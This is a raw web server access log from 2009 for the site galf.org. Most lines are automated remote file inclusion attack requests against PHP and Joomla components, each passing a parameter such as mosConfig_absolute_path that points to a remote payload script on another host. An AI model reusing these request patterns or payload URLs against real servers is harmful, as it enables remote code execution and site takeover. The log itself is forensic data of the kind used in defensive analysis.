206.225.23.4 - - [27/Sep/2009:17:02:42 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:17:02:42 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:17:02:42 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:17:02:53 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:17:10:09 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:17:10:10 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:17:10:15 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.189 - - [27/Sep/2009:17:27:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.189 - - [27/Sep/2009:17:27:44 -0700] "GET /?N=A HTTP/1.1" 200 1048 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:17:28:53 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:17:28:53 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:17:30:45 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 200 1032 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:17:31:09 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:17:31:10 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:32:22 -0700] "GET /viewbody.html?code=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:32:23 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:32:23 -0700] "GET /logs//viewbody.html?code=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:32:24 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:17:32:45 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:17:32:47 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:17:33:12 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:17:34:41 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:17:34:41 -0700] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:17:34:41 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:35:43 -0700] "GET /logs/access_090914.log%20//viewbody.html?code=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:17:37:51 -0700] "GET /logs/access_090316.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.252.26.98 - - [27/Sep/2009:17:39:46 -0700] "GET /logs/access.log//c_down.php?fpath=http://pyungan.or.kr/bbs/.injek/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.252.26.98 - - [27/Sep/2009:17:39:46 -0700] "GET /logs//c_down.php?fpath=http://pyungan.or.kr/bbs/.injek/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.252.26.98 - - [27/Sep/2009:17:39:46 -0700] "GET /c_down.php?fpath=http://pyungan.or.kr/bbs/.injek/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.252.26.98 - - [27/Sep/2009:17:39:57 -0700] "GET /logs/access_090316.log//c_down.php?fpath=http://pyungan.or.kr/bbs/.injek/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:42:10 -0700] "GET /logs/access_090720.log%20%20//modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:42:10 -0700] "GET /logs//modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:17:42:11 -0700] "GET /modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:17:44:02 -0700] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:17:44:02 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:17:44:02 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.169.175.226 - - [27/Sep/2009:17:44:08 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.169.175.226 - - [27/Sep/2009:17:44:08 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.169.175.226 - - [27/Sep/2009:17:44:08 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:17:45:48 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:17:46:14 -0700] "GET /logs/access_090323.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:46:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:46:58 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:46:58 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:46:58 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:46:58 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:46:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.169.175.226 - - [27/Sep/2009:17:49:35 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.169.175.226 - - [27/Sep/2009:17:49:35 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.169.175.226 - - [27/Sep/2009:17:49:35 -0700] "GET /logs/access_090406.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.169.175.226 - - [27/Sep/2009:17:49:41 -0700] "GET /logs/access_090824.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koryochemical.co.kr/board/download/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.11.17.16 - - [27/Sep/2009:17:51:12 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.11.17.16 - - [27/Sep/2009:17:51:12 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.11.17.16 - - [27/Sep/2009:17:51:12 -0700] "GET /logs/access_090824.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:17:51:56 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:17:51:56 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:17:51:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.254.163.150 - - [27/Sep/2009:17:53:50 -0700] "GET /modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.254.163.150 - - [27/Sep/2009:17:53:50 -0700] "GET /logs//modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.254.163.150 - - [27/Sep/2009:17:53:51 -0700] "GET /logs/access_090720.log//modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.254.163.150 - - [27/Sep/2009:17:53:53 -0700] "GET /logs/access_090810.log//modules/popnupblog/class/sendmail.php?incpath=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:17:55:30 -0700] "GET /logs/access_090323.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:17:56:33 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
76.91.234.141 - - [27/Sep/2009:17:56:38 -0700] "GET /logs/access_090817.log HTTP/1.1" 200 6654671 "http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fwww.galf.org%2Flogs%2Faccess_090817.log&ei=oQnASqndHonUsQOov9ka&rct=j&q=phpbb_root_path%3Dhttp%3A%2F%2Fwww.amembersignup.com%2Fsignup%2FMF.txt&usg=AFQjCNEcZJWHNi2d4BFQL_tPeAjUw36sMQ&sig2=XiwUJ7ClAoa6nO6IFEpEqA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)" "www.galf.org"
76.91.234.141 - - [27/Sep/2009:17:56:38 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.galf.org"
76.91.234.141 - - [27/Sep/2009:17:56:41 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:56:44 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:56:45 -0700] "GET /logs/access_090706.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:56:45 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:57:13 -0700] "GET /logs/access_090706.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:57:13 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:57:14 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:57:15 -0700] "GET /logs/access_090706.log/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:17:57:43 -0700] "GET /logs/access_090706.log/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:57:57 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:17:58:22 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [27/Sep/2009:17:59:18 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [27/Sep/2009:17:59:18 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [27/Sep/2009:17:59:18 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:18:00:52 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:18:00:52 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:18:00:52 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:16 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:16 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:16 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:22 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:45 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:45 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:45 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [27/Sep/2009:18:07:53 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:09:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:09:11 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:09:11 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:11:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:11:25 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:11:25 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:11:25 -0700] "GET /logs/access_090831.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:11:28 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:11:29 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:12:17 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:12:43 -0700] "GET /logs/access_090907.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:50 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:50 -0700] "GET /logs/access_090622.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:53 -0700] "GET /logs/access_090622.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:55 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:55 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:14:57 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
